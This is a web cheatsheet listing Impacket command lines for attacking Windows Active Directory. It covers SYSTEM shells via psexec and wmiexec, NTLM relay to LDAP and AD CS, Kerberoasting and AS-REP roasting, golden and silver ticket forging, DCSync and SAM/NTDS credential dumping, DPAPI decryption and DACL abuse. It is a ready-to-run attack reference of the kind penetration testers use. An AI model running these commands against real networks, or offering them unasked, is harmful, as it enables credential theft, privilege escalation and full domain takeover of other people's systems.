← All Cheatsheets
active-directory

Impacket — Windows & Active Directory Attacks

Impacket Python library with tools for SMB, MSRPC, Kerberos, NTLM, WMI, and AD attacks.

155 views Jul 2026 lazyhackers
Authentication & Relay (16)
impacket-psexec domain/user:[email protected]
PSExec — get SYSTEM shell via SMB
psexec smb rce
impacket-psexec domain/[email protected] -hashes :NTLMhash
PSExec with pass-the-hash
psexec pth hash
impacket-smbexec domain/user:[email protected]
SMBExec — alternative to PSExec (no file drop)
smbexec smb
impacket-wmiexec domain/user:[email protected]
WMIExec — code exec via WMI (no service)
wmiexec wmi
impacket-wmiexec domain/[email protected] -hashes :NTLMhash
WMIExec pass-the-hash
wmiexec pth
impacket-ntlmrelayx -tf targets.txt -smb2support
NTLM relay attack to target list
ntlmrelayx relay smb
impacket-ntlmrelayx -tf targets.txt -smb2support -i
NTLM relay — interactive SMB shell
ntlmrelayx relay shell
impacket-ntlmrelayx -tf targets.txt -smb2support -e shell.exe
NTLM relay — execute binary on target
ntlmrelayx relay rce
impacket-ntlmrelayx -t ldap://DC01 --escalate-user compromised_user
Relay to LDAP for privilege escalation
ntlmrelayx ldap privesc
impacket-atexec domain/user:[email protected] "whoami /all"
AtExec — command execution via the Task Scheduler service
atexec rce tasksched
impacket-dcomexec domain/user:[email protected]
DCOMExec — code exec via DCOM (MMC20 / ShellWindows / ShellBrowserWindow)
dcomexec dcom rce
impacket-ntlmrelayx -tf targets.txt -smb2support --remove-mic
Drop-the-MIC relay bypass (CVE-2019-1040)
ntlmrelayx relay cve-2019-1040
impacket-ntlmrelayx -t ldaps://DC01 --delegate-access
Relay machine auth to LDAPS and grant RBCD over the relayed computer
ntlmrelayx relay rbcd ldap
impacket-ntlmrelayx -t ldaps://DC01 --shadow-credentials --shadow-target victim$
Relay to LDAPS and add Shadow Credentials (msDS-KeyCredentialLink)
ntlmrelayx relay shadowcreds
impacket-ntlmrelayx -t http://10.10.10.1/certsrv/certfnsh.asp --adcs --template DomainController
ESC8 — relay machine auth to AD CS web enrollment to mint a cert
ntlmrelayx relay adcs esc8
impacket-ntlmrelayx -tf targets.txt -smb2support -socks
Hold relayed sessions in a SOCKS proxy pool for later use
ntlmrelayx relay socks
Kerberos Attacks (13)
impacket-GetUserSPNs domain.local/user:password -dc-ip 10.10.10.1 -request
Kerberoasting — dump TGS hashes for SPNs
kerberoast kerberos spn
impacket-GetNPUsers domain.local/ -usersfile users.txt -no-pass -dc-ip 10.10.10.1
AS-REP Roasting — users with no pre-auth
asrep kerberos roasting
impacket-GetNPUsers domain.local/ -no-pass -dc-ip 10.10.10.1
AS-REP Roast all domain users (anonymous)
asrep kerberos
impacket-ticketer -nthash NTLMhash -domain-sid S-1-5-21-xxx -domain domain.local -spn cifs/server.domain.local user
Forge Silver Ticket for service
silver-ticket kerberos forge
impacket-ticketer -nthash krbtgt_hash -domain-sid S-1-5-21-xxx -domain domain.local administrator
Forge Golden Ticket (krbtgt hash needed)
golden-ticket kerberos forge
export KRB5CCNAME=/tmp/ticket.ccache && impacket-psexec -k -no-pass domain.local/user@server
Pass-the-Ticket: use .ccache for auth
ptt kerberos ticket
impacket-getTGT domain.local/user:password -dc-ip 10.10.10.1
Request a TGT and save it as a .ccache (then export KRB5CCNAME)
kerberos tgt ccache
impacket-getST -spn cifs/srv.domain.local domain.local/svc_user:password -impersonate Administrator -dc-ip 10.10.10.1
S4U2Self+S4U2Proxy — impersonate a user via constrained delegation
kerberos s4u delegation
impacket-getST -spn cifs/target.domain.local -impersonate Administrator "domain.local/EVILPC$" -hashes :NTLMhash -dc-ip 10.10.10.1
RBCD — request a service ticket as an impersonated user
kerberos rbcd s4u
impacket-ticketer -nthash SVC_NTLMhash -domain-sid S-1-5-21-xxx -domain domain.local -spn MSSQLSvc/sql.domain.local -user-id 500 administrator
Forge a SILVER ticket for a single service (offline, no DC contact)
kerberos silver forge
impacket-raiseChild child.domain.local/childadmin:password
Child → parent domain escalation (auto golden + cross-domain)
kerberos raisechild escalation
impacket-ticketConverter ticket.kirbi ticket.ccache
Convert Rubeus .kirbi ↔ Impacket .ccache ticket formats
kerberos convert ccache
impacket-describeTicket ticket.ccache
Decode and inspect a ccache/kirbi ticket (flags, keys, PAC)
kerberos inspect
Credential Dumping (10)
impacket-secretsdump domain/user:[email protected]
Dump SAM, LSA, cached creds remotely
secretsdump creds dump
impacket-secretsdump domain/[email protected] -hashes :NTLMhash
secretsdump with pass-the-hash
secretsdump pth
impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
Offline NTDS.dit dump (local files)
secretsdump ntds offline
impacket-secretsdump domain/admin@DC01 -just-dc-ntlm
DCSync — dump all domain hashes (DA needed)
dcsync ntlm da
impacket-secretsdump domain/[email protected] -just-dc
Full DCSync — NTLM hashes + Kerberos keys (incl. krbtgt) + history
dcsync secretsdump ntds
impacket-secretsdump domain/[email protected] -just-dc-user krbtgt
Targeted DCSync — pull only krbtgt (for golden tickets)
dcsync krbtgt
impacket-secretsdump domain/[email protected] -use-vss
Dump NTDS.dit via a Volume Shadow Copy
secretsdump vss ntds
impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL
Offline parse of exported registry hives (local hashes + LSA + cached)
secretsdump offline sam
impacket-dpapi masterkey -file mkfile -sid S-1-5-21-xxx -password Passw0rd
Decrypt a DPAPI masterkey blob
dpapi decrypt
impacket-dpapi credential -file cred.blob -key 0xDECRYPTED_MASTERKEY
Decrypt a DPAPI credential blob with a recovered masterkey
dpapi credentials
Enumeration & SMB (13)
impacket-smbclient domain/user:[email protected]
Interactive SMB client
smb enum
impacket-smbclient domain/[email protected] -hashes :NTLMhash
SMB client with hash
smb pth
impacket-lookupsid domain/user:[email protected]
Enumerate users/groups via SID bruteforce
enum sid users
impacket-rpcdump domain/user:[email protected]
Dump RPC endpoints
rpc enum
impacket-reg domain/user:[email protected] query -keyName "HKLM\SAM"
Remote registry query
registry enum
impacket-mssqlclient domain/user:[email protected]
MSSQL interactive client
mssql database
impacket-mssqlclient domain/user:[email protected] -windows-auth
MSSQL with Windows auth
mssql windows-auth
impacket-GetADUsers -all domain.local/user:password -dc-ip 10.10.10.1
List all domain users with last-logon / pwd-last-set
enum ldap users
impacket-samrdump domain/user:[email protected]
Enumerate users, groups and aliases via MS-SAMR
enum samr
impacket-findDelegation domain.local/user:password -dc-ip 10.10.10.1
Enumerate unconstrained / constrained / RBCD delegation
enum delegation
impacket-services domain/user:[email protected] list
List / start / stop / create remote Windows services
enum services
impacket-smbserver share /tmp/share -smb2support
Host an SMB share (file transfer, or capture/relay auth)
smbserver relay transfer
impacket-Get-GPPPassword "domain/user:[email protected]"
Recover cPassword secrets from Group Policy Preferences (MS14-025)
gpp cpassword sysvol
ACL & Delegation Abuse (6)
impacket-dacledit -action write -rights DCSync -principal attacker -target-dn 'DC=domain,DC=local' domain.local/admin:password
Grant DCSync rights to a controlled principal (DACL abuse)
acl dacledit dcsync
impacket-dacledit -action read -principal attacker -target victimuser domain.local/user:password
Read the ACEs in an object DACL
acl dacledit
impacket-owneredit -action write -new-owner attacker -target victimobject domain.local/user:password
Take ownership of an object (WriteOwner abuse)
acl owneredit writeowner
impacket-changepasswd domain.local/[email protected] -newpass NewP@ss1 -altuser attacker -altpass Pass -reset
Force-reset a target password (ForceChangePassword / GenericAll ACL)
acl changepasswd reset
impacket-addcomputer -computer-name 'EVILPC$' -computer-pass Passw0rd domain.local/user:password -dc-ip 10.10.10.1
Add a machine account (uses MachineAccountQuota) for RBCD/shadow-creds
rbcd addcomputer maq
impacket-rbcd -delegate-from 'EVILPC$' -delegate-to 'TARGET$' -action write domain.local/user:password -dc-ip 10.10.10.1
Write msDS-AllowedToActOnBehalfOfOtherIdentity (configure RBCD)
rbcd delegation